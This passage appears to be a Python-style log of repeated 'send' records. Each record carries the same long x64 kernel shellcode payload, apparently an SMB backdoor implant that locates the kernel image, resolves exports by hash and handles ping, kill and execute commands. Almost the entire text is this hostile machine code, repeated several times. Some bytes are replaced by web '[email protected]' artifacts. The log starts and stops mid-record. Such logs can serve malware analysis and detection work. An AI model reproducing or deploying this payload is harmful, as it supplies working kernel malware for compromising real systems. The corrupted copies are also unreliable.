QH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 14, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 15, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 17, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\